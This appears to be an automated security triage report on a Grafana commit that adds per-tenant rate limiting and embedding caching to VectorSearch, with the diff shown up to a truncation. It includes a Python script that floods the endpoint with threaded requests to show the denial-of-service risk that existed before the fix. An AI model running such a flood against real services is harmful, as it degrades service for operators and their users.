Denial of Service (resource exhaustion) / Rate limiting abuse

MEDIUM
grafana/grafana
Commit: 98d5c8f44864
Affected: Versions prior to 12.4.0 (e.g., 12.3.x and earlier)
2026-05-26 09:52 UTC

Description

The commit adds two per-tenant protections in front of the unified-storage VectorSearch RPC. The first is a DB-backed query-embedding cache with FIFO eviction, so repeated identical queries no longer call the embedding provider every time. The second is a DB-backed tumbling-window rate limiter. If the rate limiter cannot be reached, requests are rejected (fail-closed) rather than let through. New settings in the [database_vector] section enable or disable each feature independently and tune its limits: the per-tenant cache cap (default 1000 entries), the per-tenant request limit (default 60) and the rate-limit window (default 1m). In short, this is genuine security-related hardening against DoS through abusive or heavy use of the VectorSearch backend.

Proof of Concept

PoC (actionable steps to demonstrate the pre-fix DoS risk):

Prerequisites:
- A Grafana instance prior to 12.4.0 (no per-tenant rate limiting or query-embedding cache in front of VectorSearch).
- VectorSearch enabled (an embedding provider configured) and reachable through the Grafana HTTP API. VectorSearch is implemented as a unified-storage RPC, so the HTTP path below is a placeholder; adjust it to your deployment.
- A tenant/namespace identifier used by VectorSearch requests.
- An authentication token or whatever method your Grafana deployment requires.

Attack concept:
- Flood the VectorSearch endpoint with rapid, repeated requests for the same tenant. Before the fix nothing limits requests per tenant, and every request calls the embedding provider and then queries the vector backend. The flood therefore drives up CPU/DB load and latency and can degrade or deny service.
- After the fix, the same flood is throttled by the default limit of 60 requests per 1-minute window per tenant. Excess requests are rejected with gRPC ResourceExhausted ("tenant rate limit exceeded"). If the limiter itself cannot be reached, requests are rejected with Unavailable. Because this PoC repeats one query, admitted requests after the first are also served from the query-embedding cache instead of the embedding provider.

Example PoC (Python; adapt the endpoint path and payload to your environment):

    import threading
    import time

    import requests

    ENDPOINT = "http://localhost:3000/api/vector_search"  # adjust to actual endpoint
    HEADERS = {"Authorization": "Bearer <TOKEN>"}
    NS = "tenant1"
    MODEL = "default"
    QUERY = "some query text that exercises embedding path"
    LIMIT = 5


    def do_request():
        payload = {"namespace": NS, "model": MODEL, "query": QUERY, "limit": LIMIT}
        try:
            r = requests.post(ENDPOINT, json=payload, timeout=5, headers=HEADERS)
            print(f"{r.status_code} {r.text[:80]}")
        except Exception as e:
            print("ERR:", e)


    def flood(rate_per_sec, duration_sec):
        end = time.time() + duration_sec
        while time.time() < end:
            batch_start = time.time()
            threads = [threading.Thread(target=do_request) for _ in range(rate_per_sec)]
            for t in threads:
                t.start()
            for t in threads:
                t.join()
            # Pace to roughly one batch per second; without this sleep the next
            # batch starts as soon as the slowest request of the previous one returns.
            time.sleep(max(0.0, 1.0 - (time.time() - batch_start)))


    if __name__ == "__main__":
        # Example: about 50 requests/sec for 60 seconds (fewer if responses take >1 s)
        flood(50, 60)

Notes:
- The exact endpoint, payload shape and auth method must match your Grafana deployment. In the diff, the namespace travels in the request key and the server picks the embedding model from its own configuration (s.embedder.Model), so the "namespace" and "model" fields above are illustrative.
- Pre-fix, even a correctly configured instance applies no per-tenant rate limit, so a sustained flood can exhaust resources. Post-fix, the instance should start returning rate-limit errors once the threshold is reached.
- Do not run this against production systems without proper authorization and change controls.
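To estimate what the PoC flood looks like after the fix, the following Go model replays a constant-rate flood against one tenant's tumbling-window counter using the fix's defaults (60 requests per 1-minute window). It assumes windows start at fixed boundaries, as a window_start column suggests. simulateFlood is a hypothetical helper, not Grafana code, and it models only admission, not the cache.

```go
package main

import "fmt"

// simulateFlood replays ratePerSec requests/s for durationSec seconds against
// a tumbling-window counter and returns how many requests are admitted and
// rejected. Times are in milliseconds; startMs is the flood's offset from a
// window boundary. Illustrative model only.
func simulateFlood(ratePerSec, durationSec, limit int, windowMs, startMs int64) (allowed, rejected int) {
	counts := map[int64]int{} // window index -> requests seen in that window
	total := ratePerSec * durationSec
	for i := 0; i < total; i++ {
		t := startMs + int64(i)*1000/int64(ratePerSec) // evenly spaced arrivals
		w := t / windowMs                               // which tumbling window t falls in
		counts[w]++
		if counts[w] <= limit {
			allowed++
		} else {
			rejected++
		}
	}
	return allowed, rejected
}

func main() {
	// PoC defaults: 50 req/s for 60 s. Fix defaults: 60 requests per 60 000 ms.
	a, r := simulateFlood(50, 60, 60, 60_000, 0)
	fmt.Println("aligned to a window:", a, "allowed,", r, "rejected")
	a, r = simulateFlood(50, 60, 60, 60_000, 30_000)
	fmt.Println("straddling a boundary:", a, "allowed,", r, "rejected")
}
```

An aligned 60-second flood gets 60 of its 3000 requests through. One that starts mid-window spans two windows and gets 120 through. Before the fix, all 3000 would reach the embedder and the vector backend. Letting up to twice the limit through around a boundary is the usual trade-off of tumbling windows compared with sliding ones.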

Commit Details

Author: Rafael Bortolon Paulovic

Date: 2026-05-26 08:03 UTC

Message:

Unified Storage: VectorSearch query-embedding cache and per-tenant rate limit (#125284)

* Unified Storage: Add VectorSearch query cache + per-tenant rate limit

Adds a pgvector-backed query embedding cache (FIFO eviction by created_at) and a DB-backed per-tenant tumbling-window rate limiter for VectorSearch. Both are always on when the backend supports them; limits are fixed in code (1000 entries/tenant; 60 requests/min/tenant). Includes background sweeper for rate-bucket housekeeping and Prometheus counters that avoid unbounded namespace cardinality.

* Unified Storage: Simplify VectorSearch query cache and metrics

Refinements on top of the initial implementation:
- Switch cache eviction from LRU to FIFO by created_at — keeps Get as a pure SELECT so hot rows don't contend on per-hit UPDATEs.
- Drop the stored query_text column; only (namespace, model, hash) -> embedding is needed.
- Rename EvictLRU -> EvictOldest to match the new policy.
- Trim implementation details from QueryEmbeddingCache / RateLimiter interface docs; document the contract instead.
- Collapse per-namespace cache metric labels to per-model where cardinality matters, and split rate-limit metrics into "rejected" vs "limiter errors" so fail-closed and over-quota stay distinguishable.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* Unified Storage: Tidy VectorSearch handler and rate-bucket schema

- Extract rate-limit check and query-embed/cache flow into helper methods so VectorSearch sits comfortably under the gocyclo limit.
- Switch sweeper goroutine to sync.WaitGroup.Go (Go 1.25).
- Define vector_search_rate_buckets via migrator.Table now that no pgvector-specific column types are involved; the cache table stays raw SQL for halfvec(1024).
- Drop a misleading comment about non-pgvector backends in withSearch.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* Unified Storage: Address VectorSearch cache + rate-limit review

- Make cache cap, rate limit threshold and rate limit window configurable via [database_vector] (defaults: enabled, 1000, 60, 1m). Both can be disabled independently via *_enabled = false.
- Evict the query cache down to 80% of the per-tenant cap in one pass instead of trimming one row per miss, so we don't DELETE on every cache miss at steady state.
- Add a standalone window_start index on vector_search_rate_buckets so the periodic sweep can use it (composite PK leads with namespace and can't satisfy a window_start-only predicate).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

Triage Assessment

Vulnerability Type: Denial of Service (resource exhaustion) / rate-limiting related protections

Confidence: MEDIUM

Reasoning:

The commit introduces per-tenant rate limiting and a query-embedding cache for VectorSearch, and fails closed when the rate limiter is unavailable. Together these bound the embedding-provider calls and database load a single tenant can generate, mitigating abuse that could otherwise lead to resource exhaustion (DoS). Although this is not a classic vulnerability class such as XSS or SQLi, it addresses a security risk from abusive request volume and the resulting latency and resource consumption.

Verification Assessment

Vulnerability Type: Denial of Service (resource exhaustion) / Rate limiting abuse

Confidence: MEDIUM

Affected Versions: Versions prior to 12.4.0 (e.g., 12.3.x and earlier)

Code Diff

    diff --git a/pkg/setting/setting.go b/pkg/setting/setting.go
    index 4d86232ed7907..113e360e459bf 100644
    --- a/pkg/setting/setting.go
    +++ b/pkg/setting/setting.go
    @@ -713,6 +713,15 @@ type Cfg struct {
         VectorPromotionThreshold int // row count per tenant to trigger promotion
         VectorPromoterInterval time.Duration // promoter tick interval; 0 disables
     
    +    // VectorSearch per-tenant query-embedding cache (DB-backed, FIFO).
    +    VectorQueryCacheEnabled bool
    +    VectorQueryCacheMaxPerTenant int
    +
    +    // VectorSearch per-tenant rate limit (DB-backed, sliding window).
    +    VectorRateLimitEnabled bool
    +    VectorRateLimitPerTenant int
    +    VectorRateLimitWindow time.Duration
    +
         // Embedding provider used by the VectorSearch RPC. "" = disabled.
         EmbeddingProvider string // "vertex" | "bedrock" | ""
         VertexProjectID string
    diff --git a/pkg/setting/setting_unified_storage.go b/pkg/setting/setting_unified_storage.go
    index 44aa54b7c52fc..7f131c30a43fc 100644
    --- a/pkg/setting/setting_unified_storage.go
    +++ b/pkg/setting/setting_unified_storage.go
    @@ -284,6 +284,13 @@ func (cfg *Cfg) setUnifiedStorageConfig() {
         cfg.VectorPromotionThreshold = vectorSection.Key("promotion_threshold").MustInt(10000)
         cfg.VectorPromoterInterval = vectorSection.Key("promoter_interval").MustDuration(0) // zero means disabled
     
    +    // Per-tenant query-embedding cache + rate limit.
    +    cfg.VectorQueryCacheEnabled = vectorSection.Key("query_cache_enabled").MustBool(true)
    +    cfg.VectorQueryCacheMaxPerTenant = vectorSection.Key("query_cache_max_per_tenant").MustInt(1000)
    +    cfg.VectorRateLimitEnabled = vectorSection.Key("rate_limit_enabled").MustBool(true)
    +    cfg.VectorRateLimitPerTenant = vectorSection.Key("rate_limit_per_tenant").MustInt(60)
    +    cfg.VectorRateLimitWindow = vectorSection.Key("rate_limit_window").MustDuration(time.Minute)
    +
         // Embedding provider for the VectorSearch RPC. Empty = disabled (RPC
         // returns Unimplemented). When set, the matching provider's connection
         // fields must also be configured.
    diff --git a/pkg/storage/unified/resource/search.go b/pkg/storage/unified/resource/search.go
    index 948f7e0cf6a3d..60433bbc24e04 100644
    --- a/pkg/storage/unified/resource/search.go
    +++ b/pkg/storage/unified/resource/search.go
    @@ -3,6 +3,8 @@ package resource
     import (
         "cmp"
         "context"
    +    "crypto/sha256"
    +    "encoding/hex"
         "fmt"
         "hash/fnv"
         "math/rand"
    @@ -170,6 +172,12 @@ type searchServer struct {
         initWorkers int
         initMinSize int
     
    +    queryCache vector.QueryEmbeddingCache
    +    queryCacheMaxPerTenant int
    +    rateLimiter vector.RateLimiter
    +    rateLimitPerTenant int
    +    rateLimitWindow time.Duration
    +
         ownsIndexFn func(key NamespacedResource) (bool, error)
     
         buildIndex singleflight.Group
    @@ -270,6 +278,12 @@ func newSearchServer(opts SearchOptions, storage StorageBackend, vectorBackend v
             selectableFields: opts.SelectableFieldsForKinds,
             injectFailuresPercent: opts.InjectFailuresPercent,
             indexModificationCacheTTL: opts.IndexModificationCacheTTL,
    +
    +        queryCache: opts.QueryCache,
    +        queryCacheMaxPerTenant: opts.QueryCacheMaxPerTenant,
    +        rateLimiter: opts.RateLimiter,
    +        rateLimitPerTenant: opts.RateLimitPerTenant,
    +        rateLimitWindow: opts.RateLimitWindow,
         }
     
         s.rebuildQueue = debouncer.NewQueue(combineRebuildRequests)
    @@ -602,26 +616,18 @@ func (s *searchServer) VectorSearch(ctx context.Context, req *resourcepb.VectorS
             attribute.Int("limit", limit),
         )
     
    -    // Embed the query as a retrieval *query* (different task hint than the
    -    // retrieval *document* hint used at index time — providers tune
    -    // projections per side of the retrieval pair).
    -    out, err := s.embedder.EmbedText(ctx, embedder.EmbedTextInput{
    -        Texts: []string{req.Query},
    -        Normalize: s.embedder.ShouldNormalize(),
    -        Task: embedder.TaskRetrievalQuery,
    -    })
    -    if err != nil {
    -        s.log.Error("vector search: embed query", "err", err)
    -        return nil, status.Error(codes.Internal, "embed query")
    +    if err := s.checkVectorSearchRateLimit(ctx, req.Key.Namespace); err != nil {
    +        return nil, err
         }
    -    if len(out.Embeddings) != 1 || len(out.Embeddings[0].Dense) == 0 {
    -        s.log.Error("vector search: embedder returned no vectors")
    -        return nil, status.Error(codes.Internal, "embed query: empty result")
    +
    +    dense, err := s.embedVectorSearchQuery(ctx, req.Key.Namespace, req.Query)
    +    if err != nil {
    +        return nil, err
         }
     
         results, err := s.vectorBackend.Search(ctx, req.Key.Namespace, s.embedder.Model, req.Key.Resource,
    -        out.Embeddings[0].Dense, limit, translateVectorSearchFilters(req.Filters)...)
    +        dense, limit, translateVectorSearchFilters(req.Filters)...)
         if err != nil {
             s.log.Error("vector search: backend", "err", err)
             return nil, status.Error(codes.Internal, "vector search backend")
    @@ -685,6 +691,109 @@ func validateVectorSearchRequest(req *resourcepb.VectorSearchRequest) *resourcep
         return nil
     }
     
    +// checkVectorSearchRateLimit returns a gRPC status error when the
    +// request must be rejected (over quota or limiter unreachable), nil
    +// when it should proceed.
    +func (s *searchServer) checkVectorSearchRateLimit(ctx context.Context, namespace string) error {
    +    if s.rateLimiter == nil {
    +        return nil
    +    }
    +    allowed, count, err := s.rateLimiter.Allow(ctx, namespace, s.rateLimitWindow, s.rateLimitPerTenant)
    +    if err != nil {
    +        s.log.Error("vector search: rate-limit check failed, fail-closed", "err", err, "namespace", namespace)
    +        if s.vectorMetrics != nil {
    +            s.vectorMetrics.RateLimiterErrorsTotal.Inc()
    +        }
    +        return status.Error(codes.Unavailable, "rate limiter unavailable")
    +    }
    +    if !allowed {
    +        if s.vectorMetrics != nil {
    +            s.vectorMetrics.RateLimitedRequestsTotal.Inc()
    +        }
    +        return status.Errorf(codes.ResourceExhausted, "tenant rate limit exceeded: %d requests in window", count)
    +    }
    +    return nil
    +}
    +
    +// embedVectorSearchQuery returns the query embedding, fetching it from
    +// the cache on hit or calling the embedder on miss (and best-effort
    +// writing back into the cache, enforcing the per-tenant cap).
    +func (s *searchServer) embedVectorSearchQuery(ctx context.Context, namespace, query string) ([]float32, error) {
    +    queryHash := sha256Hex(query)
    +    if dense, ok := s.lookupCachedQueryEmbedding(ctx, namespace, queryHash); ok {
    +        return dense, nil
    +    }
    +
    +    // Embed the query as a retrieval *query* (different task hint than
    +    // the retrieval *document* hint used at index time — providers tune
    +    // projections per side of the retrieval pair).
    +    out, err := s.embedder.EmbedText(ctx, embedder.EmbedTextInput{
    +        Texts: []string{query},
    +        Normalize: s.embedder.ShouldNormalize(),
    +        Task: embedder.TaskRetrievalQuery,
    +    })
    +    if err != nil {
    +        s.log.Error("vector search: embed query", "err", err)
    +        return nil, status.Error(codes.Internal, "embed query")
    +    }
    +    if len(out.Embeddings) != 1 || len(out.Embeddings[0].Dense) == 0 {
    +        s.log.Error("vector search: embedder returned no vectors")
    +        return nil, status.Error(codes.Internal, "embed query: empty result")
    +    }
    +    dense := out.Embeddings[0].Dense
    +    if s.vectorMetrics != nil {
    +        s.vectorMetrics.QueryCacheMissesTotal.WithLabelValues(s.embedder.Model).Inc()
    +    }
    +    s.storeCachedQueryEmbedding(ctx, namespace, queryHash, dense)
    +    return dense, nil
    +}
    +
    +// lookupCachedQueryEmbedding returns (embedding, true) on hit; (nil,
    +// false) on miss or any error (cache failures must not fail the search).
    +func (s *searchServer) lookupCachedQueryEmbedding(ctx context.Context, namespace, queryHash string) ([]float32, bool) {
    +    if s.queryCache == nil {
    +        return nil, false
    +    }
    +    emb, hit, err := s.queryCache.Get(ctx, namespace, s.embedder.Model, queryHash)
    +    if err != nil {
    +        s.log.Warn("vector search: cache lookup failed, falling through", "err", err)
    +        return nil, false
    +    }
    +    if !hit {
    +        return nil, false
    +    }
    +    if s.vectorMetrics != nil {
    +        s.vectorMetrics.QueryCacheHitsTotal.WithLabelValues(s.embedder.Model).Inc()
    +    }
    +    return emb, true
    +}
    +
    +// vectorQueryCacheEvictTargetFraction is how full the cache is left
    +// after an eviction round runs.
    +const vectorQueryCacheEvictTargetFraction = 0.8
    +
    +// storeCachedQueryEmbedding writes the freshly-embedded vector into the
    +// cache (best-effort). When the tenant is at or above the cap, eviction
    +// trims down to vectorQueryCacheEvictTargetFraction of the cap in one
    +// pass so we don't run a DELETE on every cache miss at steady state.
    +func (s *searchServer) storeCachedQueryEmbedding(ctx context.Context, namespace, queryHash string, dense []float32) {
    +    if s.queryCache == nil || s.queryCacheMaxPerTenant <= 0 {
    +        return
    +    }
    +    if n, err := s.queryCache.Count(ctx, namespace); err == nil && int(n) >= s.queryCacheMaxPerTenant {
    +        target := int(float64(s.queryCacheMaxPerTenant) * vectorQueryCacheEvictTargetFraction)
    +        evictN := int(n) - target
    +        if deleted, err := s.queryCache.EvictOldest(ctx, namespace, evictN); err != nil {
    +            s.log.Warn("vector search: cache evict failed", "err", err)
    +        } else if deleted > 0 && s.vectorMetrics != nil {
    +            s.vectorMetrics.QueryCacheEvictionsTotal.Add(float64(deleted))
    +        }
    +    }
    +    if err := s.queryCache.Put(ctx, namespace, s.embedder.Model, queryHash, dense); err != nil {
    +        s.log.Warn("vector search: cache put failed", "err", err)
    +    }
    +}
    +
     // vectorAuthzKey de-dupes (UID, Folder) so sub-resources of the same
     // parent (e.g. dashboard panels) share a single batch-check entry.
     type vectorAuthzKey struct{ uid, folder string }
    @@ -1028,6 +1137,8 @@ func (s *searchServer) init(ctx context.Context) error {
         s.bgTaskWg.Add(1)
         go s.runPeriodicScanForIndexesToRebuild(subctx)
     
    +    s.startRateBucketSweeper(subctx)
    +
         end := time.Now().Unix()
         s.log.Info("search index initialized", "duration_secs", end-start, "total_docs", s.search.TotalDocs())
         return nil
    @@ -1080,6 +1191,42 @@ func (s *searchServer) runPeriodicScanForIndexesToRebuild(ctx context.Context) {
         }
     }
     
    +func sha256Hex(s string) string {
    +    h := sha256.Sum256([]byte(s))
    +    return hex.EncodeToString(h[:])
    +}
    +
    +// Old buckets never affect Allow() — sweeping is purely housekeeping.
    +func (s *searchServer) startRateBucketSweeper(ctx context.Context) {
    +    if s.rateLimiter == nil || s.rateLimitWindow <= 0 {
    +        return
    +    }
    +    s.bgTaskWg.Go(func() {
    +        interval := s.rateLimitWindow / 2
    +        if interval < time.Minute {
    +            interval = time.Minute
    +        }
    +        t := time.NewTicker(interval)
    +        defer t.Stop()
    +        for {
    +            select {
    +            case <-ctx.Done():
    +                return
    +            case <-t.C:
    +                cutoff := time.Now().Add(-2 * s.rateLimitWindow)
    +                deleted, err := s.rateLimiter.SweepOlderThan(ctx, cutoff)
    +                if err != nil {
    +                    s.log.Warn("rate-bucket sweep failed", "err", err)
    +                    continue
    +                }
    +                if deleted > 0 {
    +                    s.log.Debug("rate-bucket sweep", "deleted", deleted, "cutoff", cutoff)
    +                }
    +            }
    +        }
    +    })
    +}
    +
     // jitterForKey returns a deterministic jitter duration for the given key,
     // bounded to [0, maxAge/2). This spreads index rebuilds across scan intervals
     // to avoid thundering herd CPU spikes when many indexes become stale at once.
    diff --git a/pkg/storage/unified/resource/search_vector_cache_test.go b/pkg/storage/unified/resource/search_vector_cache_test.go
    new file mode 100644
    index 0000000000000..abcf4ea7b8f9c
    --- /dev/null
    +++ b/pkg/storage/unified/resource/search_vector_cache_test.go
    @@ -0,0 +1,233 @@
    +package resource
    +
    +import (
    +    "context"
    +    "errors"
    +    "sync"
    +    "testing"
    +    "time"
    +
    +    "github.com/stretchr/testify/assert"
    +    "github.com/stretchr/testify/require"
    +    "google.golang.org/grpc/codes"
    +    "google.golang.org/grpc/status"
    +
    +    "github.com/grafana/grafana/pkg/storage/unified/resourcepb"
    +    "github.com/grafana/grafana/pkg/storage/unified/search/embed/embedder"
    +    "github.com/grafana/grafana/pkg/storage/unified/search/vector"
    +)
    +
    +type fakeQueryCache struct {
    +    mu sync.Mutex
    +    entries map[string][]float32
    +    getCalls int
    +    putCalls int
    +    evicted int64
    +    putErr error
    +    getErr error
    +}
    +
    +func newFakeQueryCache() *fakeQueryCache {
    +    return &fakeQueryCache{entries: map[string][]float32{}}
    +}
    +
    +func cacheKey(ns, model, hash string) string { return ns + "|" + model + "|" + hash }
    +
    +func (f *fakeQueryCache) Get(_ context.Context, ns, model, hash string) ([]float32, bool, error) {
    +    f.mu.Lock()
    +    defer f.mu.Unlock()
    +    f.getCalls++
    +    if f.getErr != nil {
    +        return nil, false, f.getErr
    +    }
    +    if v, ok := f.entries[cacheKey(ns, model, hash)]; ok {
    +        return v, true, nil
    +    }
    +    return nil, false, nil
    +}
    +
    +func (f *fakeQueryCache) Put(_ context.Context, ns, model, hash string, emb []float32) error {
    +    f.mu.Lock()
    +    defer f.mu.Unlock()
    +    f.putCalls++
    +    if f.putErr != nil {
    +        return f.putErr
    +    }
    +    f.entries[cacheKey(ns, model, hash)] = emb
    +    return nil
    +}
    +
    +func (f *fakeQueryCache) Count(_ context.Context, ns string) (int64, error) {
    +    f.mu.Lock()
    +    defer f.mu.Unlock()
    +    var n int64
    +    for k := range f.entries {
    +        // Prefix match is safe because tests use unique namespaces.
    +        if len(k) >= len(ns) && k[:len(ns)] == ns {
    +            n++
    +        }
    +    }
    +    return n, nil
    +}
    +
    +func (f *fakeQueryCache) EvictOldest(_ context.Context, ns string, n int) (int64, error) {
    +    f.mu.Lock()
    +    defer f.mu.Unlock()
    +    deleted := int64(0)
    +    for k := range f.entries {
    +        if deleted >= int64(n) {
    +            break
    +        }
    +        if len(k) >= len(ns) && k[:len(ns)] == ns {
    +            delete(f.entries, k)
    +            deleted++
    +        }
    +    }
    +    f.evicted += deleted
    +    return deleted, nil
    +}
    +
    +type fakeRateLimiter struct {
    +    mu sync.Mutex
    +    calls int
    +    count int64
    +    allow bool
    +    err error
    +    sweeps int
    +    swept int64
    +    sweepEr error
    +}
    +
    +func (f *fakeRateLimiter) Allow(_ context.Context, _ string, _ time.Duration, _ int) (bool, int64, error) {
    +    f.mu.Lock()
    +    defer f.mu.Unlock()
    +    f.calls++
    +    if f.err != nil {
    +        return false, 0, f.err
    +    }
    +    return f.allow, f.count, nil
    +}
    +
    +func (f *fakeRateLimiter) SweepOlderThan(_ context.Context, _ time.Time) (int64, error) {
    +    f.mu.Lock()
    +    defer f.mu.Unlock()
    +    f.sweeps++
    +    return f.swept, f.sweepEr
    +}
    +
    +func newTestSearchServerWithCache(emb *embedder.Embedder, backend vector.VectorBackend, cache vector.QueryEmbeddingCache, rl vector.RateLimiter) *searchServer {
    +    s := newTestSearchServer(emb, backend)
    +    s.queryCache = cache
    +    s.queryCacheMaxPerTenant = 1000
    +    s.rateLimiter = rl
    +    s.rateLimitPerTenant = 60
    +    s.rateLimitWindow = time.Minute
    +    return s
    +}
    +
    +func TestVectorSearch_CacheMissThenHitSkipsEmbedder(t *testing.T) {
    +    fake := &fakeTextEmbedder{dim: 4}
    +    emb := newTestEmbedder(fake)
    +    backend := &fakeVectorBackend{results: []vector.VectorSearchResult{{UID: "u", Title: "t"}}}
    +    cache := newFakeQueryCache()
    +    s := newTestSearchServerWithCache(emb, backend, cache, nil)
    +
    +    req := &resourcepb.VectorSearchRequest{Key: validKey(), Query: "same query", Limit: 5}
    +
    +    _, err := s.VectorSearch(authedCtx(), req)
    +    require.NoError(t, err)
    +    assert.Equal(t, 1, cache.getCalls)
    +    assert.Equal(t, 1, cache.putCalls)
    +    assert.Equal(t, "same query", fake.gotIn.Texts[0])
    +
    +    // Reset the captur ... [truncated]